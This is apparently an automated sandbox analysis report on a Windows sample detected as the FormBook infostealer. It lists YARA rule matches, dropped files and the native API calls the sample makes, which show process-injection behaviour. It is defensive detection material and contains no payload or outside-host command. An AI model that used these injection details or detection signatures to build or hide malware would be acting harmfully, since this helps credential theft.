          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: iscan.exe PID: 5188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 1916, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: PrWP76ejHO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: iscan.exe PID: 5188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 1916, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00406333
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0041687D
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040B4A4
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040C1ED
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040B9A0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040BDB8
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040C622
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0045090D
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00450CF2
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004228B2
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421B51
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421449
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004044C7
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004044BE
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040B522
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040B527
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004046E7
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040FF77
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A520A0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF20A8
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B090
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF28EC
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AFE824
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1002
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2F900
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF22AE
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADFA2B
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5EBB0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5138B
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4EB9A
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD23E3
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE03DA
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEDBD2
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5ABD8
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF2B28
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ACCB4F
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4AB40
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3841F
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AED466
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52581
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3D5E0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF25DD
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A20D20
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF2D07
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF1D55
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF2EF7
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A46E30
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AED616
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF1FF1
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AFDFCE
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: String function: 00A2B150 appears 139 times
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E047 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E0C7 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E177 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041DF97 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E041 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E0C1 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E171 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004012A4 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004014E9 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A699D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69B00 NtSetValueKey,
